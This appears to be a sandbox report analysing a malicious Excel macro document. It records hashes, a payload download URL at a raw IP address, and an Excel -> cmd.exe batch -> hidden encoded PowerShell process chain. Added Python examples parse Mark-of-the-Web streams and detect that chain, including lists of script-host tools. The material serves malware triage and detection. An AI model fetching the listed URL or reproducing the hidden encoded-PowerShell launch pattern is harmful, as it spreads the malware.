Analysis
max time kernel: 133s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-11-2024 22:32

Static task: static1

Behavioral task: behavioral1
Sample: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource: win10v2004-20241007-en
General
Target: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Size: 14KB
MD5: 70820ac2bb527bb0a10747a06d2c2b0b
SHA1: 7289b7ddcdcaa9450c27e1579f36d67a544cee80
SHA256: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753
SHA512: 64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5
SSDEEP: 384:A0z+vPw85+pkQ1z7fMc+8Pty4jZwENYBp7zMLmh:p+3ZgkKzDMCXjZwENmdKk
Malware Config
Extracted URL (network IoC): http://84.252.122.205/xcx/system.exe
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here the chain is EXCEL.EXE running cmd.exe on a .bat file in the user's Documents folder, which in turn launches powershell.exe with an encoded command (see the process tree below).
Description | PID | PID target | Process | ProcID target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4304 | 396 | cmd.exe | 82

Blocklisted process makes network request (1 IoC)
Flow | PID | Process
21 | 1908 | powershell.exe

Deletes itself (1 IoC)
PID | Process
396 | EXCEL.EXE

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. Note that the reading process here is EXCEL.EXE itself rather than a dropped payload, so on its own this is weak evidence of evasion.
Description | IoC | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Description | IoC | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

NTFS ADS (1 IoC)
Description | IoC | Process
File created | C:\Users\Admin\AppData\Local\Temp\CBB75E00\:Zone.Identifier:$DATA | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
PID | Process
396 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
PID | Process
1908 | powershell.exe
1908 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Description | PID | Process
Token: SeDebugPrivilege | 1908 | powershell.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
PID | Process
396 | EXCEL.EXE
396 | EXCEL.EXE

Suspicious use of SetWindowsHookEx (12 IoCs)
PID | Process
396 | EXCEL.EXE (12 identical entries)

Suspicious use of WriteProcessMemory (4 IoCs)
Each write goes from a parent into the child it has just spawned (396 -> 4304, 4304 -> 1908), which is consistent with ordinary process creation rather than injection into an unrelated process.
Description | PID | Process | ProcID target
PID 396 wrote to memory of 4304 | 396 | EXCEL.EXE | 84
PID 396 wrote to memory of 4304 | 396 | EXCEL.EXE | 84
PID 4304 wrote to memory of 1908 | 4304 | cmd.exe | 86
PID 4304 wrote to memory of 1908 | 4304 | cmd.exe | 86
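The NTFS ADS entry above records EXCEL.EXE writing a `:Zone.Identifier:$DATA` stream, the Mark of the Web that Windows and Office consult to decide whether a file arrived from the Internet zone. The following is an added example, not code from the sandbox report or from the sample: it parses a Zone.Identifier stream and classifies its zone. The stream text is constructed (the report records only that the stream was created, not its contents), and `read_mark_of_the_web` is a hypothetical helper name.

```python
"""Parse an NTFS Zone.Identifier alternate data stream (Mark of the Web).

Added example for this report; the sample stream below is constructed and
is not the stream the sandbox observed EXCEL.EXE create.
"""
import configparser
from dataclasses import dataclass
from typing import Optional

# URLZONE values as used in the ZoneId field (urlmon.h).
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


@dataclass(frozen=True)
class MarkOfTheWeb:
    zone_id: int
    referrer_url: Optional[str]
    host_url: Optional[str]

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, f"Unknown zone {self.zone_id}")

    @property
    def from_untrusted_zone(self) -> bool:
        # Internet (3) and Restricted sites (4); Office's default macro block
        # keys on the Internet mark, which is what a mailed/downloaded .xlsm carries.
        return self.zone_id >= 3


def parse_zone_identifier(stream_text: str) -> Optional[MarkOfTheWeb]:
    """Parse the INI-style [ZoneTransfer] section; None if it is not MOTW."""
    parser = configparser.ConfigParser(interpolation=None)  # URLs contain '%'
    try:
        parser.read_string(stream_text)
    except configparser.Error:
        return None
    if not parser.has_section("ZoneTransfer"):
        return None
    section = parser["ZoneTransfer"]
    try:
        zone_id = int(section.get("ZoneId", "").strip())
    except ValueError:
        return None
    return MarkOfTheWeb(
        zone_id=zone_id,
        referrer_url=section.get("ReferrerUrl"),
        host_url=section.get("HostUrl"),
    )


def read_mark_of_the_web(path: str) -> Optional[MarkOfTheWeb]:
    """Read <path>:Zone.Identifier on NTFS; None if the file has no MOTW.

    Hypothetical helper: on non-NTFS filesystems the ':Zone.Identifier'
    suffix is just an unusual filename, open() fails and None is returned.
    """
    try:
        with open(f"{path}:Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


# Constructed stream in the shape a browser or mail client writes it.
SAMPLE_STREAM = (
    "[ZoneTransfer]\n"
    "ZoneId=3\n"
    "ReferrerUrl=https://mail.example.invalid/\n"
    "HostUrl=https://files.example.invalid/invoice.xlsm\n"
)

if __name__ == "__main__":
    motw = parse_zone_identifier(SAMPLE_STREAM)
    print(motw.zone_name, "untrusted:", motw.from_untrusted_zone)
```

In triage the useful question is whether the stream on the delivered document carried ZoneId=3: if it did and macros still ran, the user or policy overrode the default block; if the stream is absent (container formats such as ISO historically stripped it), that is the delivery trick to look for.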
Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 396)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm"
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe (PID 4304, child of 396)
  Command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Cxrgbutjpc.bat
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1908, child of 4304)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc <encoded command elided>
    (-win 1 is -WindowStyle Hidden; -enc takes a base64-encoded UTF-16LE command)
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
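The tree above is the classic Office macro chain: EXCEL.EXE spawns cmd.exe to run a batch file, which launches powershell.exe hidden with a base64-encoded command. The following is an added example, not part of the report or the sample, showing the detection logic a SOC would run over process-creation telemetry: it flags script hosts whose parent or ancestor is an Office application and decodes any -EncodedCommand payload. The events are constructed to mirror the PIDs and paths in this report (Excel's own parent PID, the field names and the event shape are assumptions), and because the report elides the real encoded command, a harmless constructed one is substituted.

```python
"""Detect the Office -> cmd.exe -> powershell -enc chain in process telemetry.

Added example; the events are constructed in the shape of Sysmon event 1
records (pid, ppid, image, command line) and are not the sandbox's data.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec;
# -e and -enc are the forms usually seen in the wild.
_ENC_FORMS = sorted({"encodedcommand"[:n] for n in range(1, 15)} | {"ec"},
                    key=len, reverse=True)
ENC_RE = re.compile(
    r"(?<![\w-])-(?:" + "|".join(_ENC_FORMS) + r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the -EncodedCommand payload decoded from base64(UTF-16LE), if any."""
    match = ENC_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events: List[ProcEvent]) -> List[Finding]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        # Direct case: an Office binary is the parent of a script host.
        if parent is not None and parent.name in OFFICE_IMAGES and ev.name in SCRIPT_HOSTS:
            findings.append(Finding(ev.pid, "office_spawns_script_host",
                                    f"{parent.name} -> {ev.name}"))
        if ev.name not in POWERSHELL:
            continue
        # Indirect case: walk ancestors so a cmd.exe / .bat hop does not hide Office.
        seen = set()
        anc = parent
        while anc is not None and anc.name not in OFFICE_IMAGES and anc.pid not in seen:
            seen.add(anc.pid)
            anc = by_pid.get(anc.ppid)
        if anc is not None and anc.name in OFFICE_IMAGES:
            findings.append(Finding(ev.pid, "office_ancestor_of_powershell",
                                    f"{anc.name} (pid {anc.pid}) is an ancestor"))
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            findings.append(Finding(ev.pid, "powershell_encoded_command", decoded))
    return findings


# Constructed stand-in for the elided payload (the real one is not on the page).
_PLACEHOLDER_ENC = base64.b64encode(
    "Write-Host 'placeholder'".encode("utf-16-le")).decode("ascii")

# Constructed events mirroring this report's tree; Excel's ppid (1200) is invented.
SAMPLE_EVENTS = [
    ProcEvent(396, 1200, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" '
              r'"C:\Users\Admin\AppData\Local\Temp\sample.xlsm"'),
    ProcEvent(4304, 396, r"C:\Windows\system32\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Cxrgbutjpc.bat"),
    ProcEvent(1908, 4304, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc "
              + _PLACEHOLDER_ENC),
    ProcEvent(5000, 1200, r"C:\Windows\explorer.exe", "explorer.exe"),  # benign noise
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule}: {f.detail}")
```

The ancestor walk is the part worth keeping: a rule that only looks at the immediate parent misses this sample, because powershell.exe's parent is cmd.exe, not EXCEL.EXE. Decoding the payload in the same pass gives the analyst the actual script rather than a base64 blob, and is where the extracted URL above would normally surface.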
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 21KB
MD5: 37a9a5f09363b1dc454e5b25a6b8987f
SHA1: 14a03b0b848ad050ea4695afb675ee12bf0ef356
SHA256: 710bd0d11aceee2119bc3fd61bfc20e32e7d3503d864a1d927bfb89670f04e4f
SHA512: ca184538fe75528b9fd2c2fd733653d1d5b0f885f598b4141c70c108dfcb459e1c0e41607abd0896409709f067196dec6583ced5f1fa941c7580271e9761538d

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 1KB
MD5: ccbd8bf6fbf1c244343b9df87b99667b
SHA1: 3d42ddd2295e58f3b6ef449c1a96f01c9e7536d6
SHA256: 7405c5446bf82088b1ae0525a11f810d6e78e8dbcc9af03b8fc4e7083c9bd8a4
SHA512: f71a69dc877f7603272264adfced815a5571ded666bf431e0668af2c3abb5ee93f56dfe64cc0f7c9ebe0f2e65a6159b601d20be42b7fdb9f4dcdbfee23fa772e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 1KB
MD5: 9ae67225ac461c1c8f8152b4155d71aa
SHA1: 5af72ad52f6aeef3668a90b94ca399fa3b31b744
SHA256: 799030b52f65e2c223184be15c593499e8ba8e2e39440118515e3408ff769ea0
SHA512: 29ac6ef0a69c65e4f7cda186d2e4cd692853bf9b7944701f7bbb73316357776f0439bd9ce2a871334e7f6d60435b820c34f2fb5e81ffb2ef93b668947844d951

Filesize: 587B
MD5: 31814477e987cc1e94638caa7f39f293
SHA1: c3814edcc331117303ced19f53006a4ecd09a833
SHA256: de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4
SHA512: 09a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268